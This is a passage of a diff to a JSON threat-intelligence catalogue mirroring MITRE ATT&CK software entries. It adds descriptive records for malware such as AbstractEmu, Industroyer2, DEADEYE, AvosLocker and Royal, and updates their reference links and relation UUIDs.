+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f7827069-0bf2-4764-af4f-23fae0d181b7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "6c575670-d14c-4c7f-9b9d-fd1b363e255d",
+ "value": "KEYPLUG - S1051"
+ },
{
"description": "[Milan](https://attack.mitre.org/software/S1015) is a backdoor implant based on [DanBot](https://attack.mitre.org/software/S1014) that was written in Visual C++ and .NET. [Milan](https://attack.mitre.org/software/S1015) has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2020.(Citation: ClearSky Siamesekitten August 2021)(Citation: Kaspersky Lyceum October 2021)",
"meta": {
@@ -26075,6 +26950,180 @@
"uuid": "aea6d6b8-d832-4c90-a1bb-f52c6684db6c",
"value": "Milan - S1015"
},
+ {
+ "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) is mobile malware that was first seen in Google Play and other third-party stores in October 2021. It was discovered in 19 Android applications, of which at least 7 abused known Android exploits for obtaining root permissions. [AbstractEmu](https://attack.mitre.org/software/S1061) was observed primarily impacting users in the United States, however victims are believed to be across a total of 17 countries.(Citation: lookout_abstractemu_1021)",
+ "meta": {
+ "external_id": "S1061",
+ "mitre_platforms": [
+ "Android"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1061",
+ "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign"
+ ],
+ "synonyms": [
+ "AbstractEmu"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "198ce408-1470-45ee-b47f-7056050d4fc2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "1d1b1558-c833-482e-aabb-d07ef6eae63d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2282a98b-5049-4f61-9381-55baca7c1add",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "27d18e87-8f32-4be1-b456-39b90454360f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2aa78dfd-cb6f-4c70-9408-137cfd96be49",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "2bb20118-e6c0-41dc-a07c-283ea4dd0fb8",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "32063d7f-0a39-440d-a4a3-2694488f96cc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "39dd7871-f59b-495f-a9a5-3cb8cc50c9b2",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "693cdbff-ea73-49c6-ac3f-91e7285c31d1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "6ffad4be-bfe0-424f-abde-4d9a84a800ad",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "9c049d7b-c92a-4733-9381-27e2bd2ccadc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c6421411-ae61-42bb-9098-73fddb315002",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d4536441-1bcc-49fa-80ae-a596ed3f7ffd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d8940e76-f9c1-4912-bea6-e21c251370b6",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e1c912a9-e305-434b-9172-8a6ce3ec9c4a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e2ea7f6b-8d4f-49c3-819d-660530d12b77",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "2aec175b-4429-4048-8e09-3ef6cbecfc64",
+ "value": "AbstractEmu - S1061"
+ },
{
"description": "[XAgentOSX](https://attack.mitre.org/software/S0161) is a trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be a port of their standard [CHOPSTICK](https://attack.mitre.org/software/S0023) or XAgent trojan. (Citation: XAgentOSX 2017)",
"meta": {
@@ -26936,13 +27985,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
"tags": [
@@ -27143,6 +28185,34 @@
"uuid": "89c3dbf6-f281-41b7-be1d-a0e641014853",
"value": "Concipit1248 - S0426"
},
+ {
+ "description": "[Industroyer2](https://attack.mitre.org/software/S1072) is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in [Industroyer](https://attack.mitre.org/software/S0604). Security researchers assess that [Industroyer2](https://attack.mitre.org/software/S1072) was designed to cause impact to high-voltage electrical substations. The initial [Industroyer2](https://attack.mitre.org/software/S1072) sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, however it was discovered before deploying, resulting in no impact.(Citation: Industroyer2 Blackhat ESET)",
+ "meta": {
+ "external_id": "S1072",
+ "mitre_platforms": [
+ "Field Controller/RTU/PLC/IED",
+ "Engineering Workstation"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1072",
+ "https://www.youtube.com/watch?v=xC9iM5wVedQ"
+ ],
+ "synonyms": [
+ "Industroyer2"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5",
+ "value": "Industroyer2 - S1072"
+ },
{
"description": "[CORALDECK](https://attack.mitre.org/software/S0212) is an exfiltration tool used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)",
"meta": {
@@ -27313,14 +28383,14 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -28487,7 +29557,7 @@
"refs": [
"https://attack.mitre.org/software/S0412",
"https://blogs.cisco.com/security/talos/opening-zxshell",
- "https://content.fireeye.com/apt-41/rpt-apt41"
+ "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf"
],
"synonyms": [
"ZxShell",
@@ -28670,13 +29740,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -28799,6 +29862,119 @@
"uuid": "3c02fb1f-cbdb-48f5-abaf-8c81d6e0c322",
"value": "KARAE - S0215"
},
+ {
+ "description": "[DEADEYE](https://attack.mitre.org/software/S1052) is a malware launcher that has been used by [APT41](https://attack.mitre.org/groups/G0096) since at least May 2021. [DEADEYE](https://attack.mitre.org/software/S1052) has variants that can either embed a payload inside a compiled binary (DEADEYE.EMBED) or append it to the end of a file (DEADEYE.APPEND).(Citation: Mandiant APT41)",
+ "meta": {
+ "external_id": "S1052",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1052",
+ "https://www.mandiant.com/resources/apt41-us-state-governments"
+ ],
+ "synonyms": [
+ "DEADEYE",
+ "DEADEYE.EMBED",
+ "DEADEYE.APPEND"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "0533ab23-3f7d-463f-9bd8-634d27e4dee1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "853c4192-4311-43e1-bfbb-b11b14911852",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "c46eb8e6-bf29-4696-8008-3ddb0b4ca470",
+ "value": "DEADEYE - S1052"
+ },
{
"description": "[Amadey](https://attack.mitre.org/software/S1025) is a Trojan bot that has been used since at least October 2018.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)",
"meta": {
@@ -29115,7 +30291,7 @@
],
"refs": [
"https://attack.mitre.org/software/S0152",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf"
],
"synonyms": [
"EvilGrab"
@@ -29236,6 +30412,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "215d9700-5881-48b8-8265-6449dbb7195d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e",
"tags": [
@@ -29264,13 +30447,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b",
"tags": [
@@ -29348,13 +30524,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cba37adb-d6fb-4610-b069-dd04c0643384",
"tags": [
@@ -29404,13 +30573,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b",
"tags": [
@@ -29598,13 +30760,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -29660,13 +30815,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "a4f57468-fbd5-49e4-8476-52088220b92d",
@@ -29697,6 +30845,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "0533ab23-3f7d-463f-9bd8-634d27e4dee1",
"tags": [
@@ -29802,6 +30957,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8",
"tags": [
@@ -30755,13 +31917,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "65341f30-bec6-4b1d-8abf-1a5620446c29",
@@ -32201,6 +33356,134 @@
"uuid": "a2282af0-f9dd-4373-9b92-eaf9e11e0c71",
"value": "Final1stspy - S0355"
},
+ {
+ "description": "[AvosLocker](https://attack.mitre.org/software/S1053) is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, [AvosLocker](https://attack.mitre.org/software/S1053) had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.(Citation: Malwarebytes AvosLocker Jul 2021)(Citation: Trend Micro AvosLocker Apr 2022)(Citation: Joint CSA AvosLocker Mar 2022)",
+ "meta": {
+ "external_id": "S1053",
+ "mitre_platforms": [
+ "Linux",
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1053",
+ "https://www.ic3.gov/Media/News/2022/220318.pdf",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker"
+ ],
+ "synonyms": [
+ "AvosLocker"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "208884f1-7b83-4473-ac22-4e1cf6c41471",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "28170e17-8384-415c-8486-2e6b294cb803",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ea4c2f9c-9df1-477c-8c42-6da1118f2ac4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "0945a1a5-a79a-47c8-9079-10c16cdfcb5d",
+ "value": "AvosLocker - S1053"
+ },
{
"description": "[Cannon](https://attack.mitre.org/software/S0351) is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. (Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)",
"meta": {
@@ -32274,13 +33557,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
@@ -32497,6 +33773,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -32799,7 +34082,7 @@
"https://attack.mitre.org/software/S0153",
"https://twitter.com/ItsReallyNick/status/850105140589633536",
"https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf"
],
"synonyms": [
"RedLeaves",
@@ -32919,13 +34202,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
@@ -32953,13 +34229,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "17b40f60-729f-4fe8-8aea-cc9ee44a95d5",
@@ -33116,6 +34385,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
"tags": [
@@ -33487,7 +34763,7 @@
"refs": [
"https://attack.mitre.org/software/S0137",
"https://securelist.com/a-slice-of-2017-sofacy-activity/83930/",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
+ "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
"https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf"
],
"synonyms": [
@@ -33702,6 +34978,121 @@
"uuid": "f9854ba6-989d-43bf-828b-7240b8a65291",
"value": "Marcher - S0317"
},
+ {
+ "description": "[Royal](https://attack.mitre.org/software/S1073) is ransomware that first appeared in early 2022; a version that also targets ESXi servers was later observed in February 2023. [Royal](https://attack.mitre.org/software/S1073) employs partial encryption and multiple threads to evade detection and speed encryption. [Royal](https://attack.mitre.org/software/S1073) has been used in attacks against multiple industries worldwide--including critical infrastructure. Security researchers have identified similarities in the encryption routines and TTPs used in [Royal](https://attack.mitre.org/software/S1073) and [Conti](https://attack.mitre.org/software/S0575) attacks and noted a possible connection between their operators.(Citation: Microsoft Royal ransomware November 2022)(Citation: Cybereason Royal December 2022)(Citation: Kroll Royal Deep Dive February 2023)(Citation: Trend Micro Royal Linux ESXi February 2023)(Citation: CISA Royal AA23-061A March 2023)",
+ "meta": {
+ "external_id": "S1073",
+ "mitre_platforms": [
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1073",
+ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a",
+ "https://www.cybereason.com/blog/royal-ransomware-analysis",
+ "https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive",
+ "https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/",
+ "https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html"
+ ],
+ "synonyms": [
+ "Royal"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ }
+ ],
+ "uuid": "802a874d-7463-4f2a-99e3-6a1f5a919a21",
+ "value": "Royal - S1073"
+ },
{
"description": "[OLDBAIT](https://attack.mitre.org/software/S0138) is a credential harvester used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)",
"meta": {
@@ -33711,7 +35102,7 @@
],
"refs": [
"https://attack.mitre.org/software/S0138",
- "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
+ "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf",
"https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf"
],
"synonyms": [
@@ -34631,7 +36022,7 @@
"https://attack.mitre.org/software/S0144",
"https://twitter.com/ItsReallyNick/status/850105140589633536",
"https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html",
- "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf"
],
"synonyms": [
"ChChes",
@@ -35273,6 +36664,124 @@
"uuid": "17e919aa-4a49-445c-b103-dbb8df9e7351",
"value": "POWERSOURCE - S0145"
},
+ {
+ "description": "[Drinik](https://attack.mitre.org/software/S1054) is an evolving Android banking trojan that was observed targeting customers of around 27 banks in India in August 2021. Initially seen as an SMS stealer in 2016, [Drinik](https://attack.mitre.org/software/S1054) resurfaced as a banking trojan with more advanced capabilities included in subsequent versions between September 2021 and August 2022.(Citation: cyble_drinik_1022)",
+ "meta": {
+ "external_id": "S1054",
+ "mitre_platforms": [
+ "Android"
+ ],
+ "refs": [
+ "https://attack.mitre.org/software/S1054",
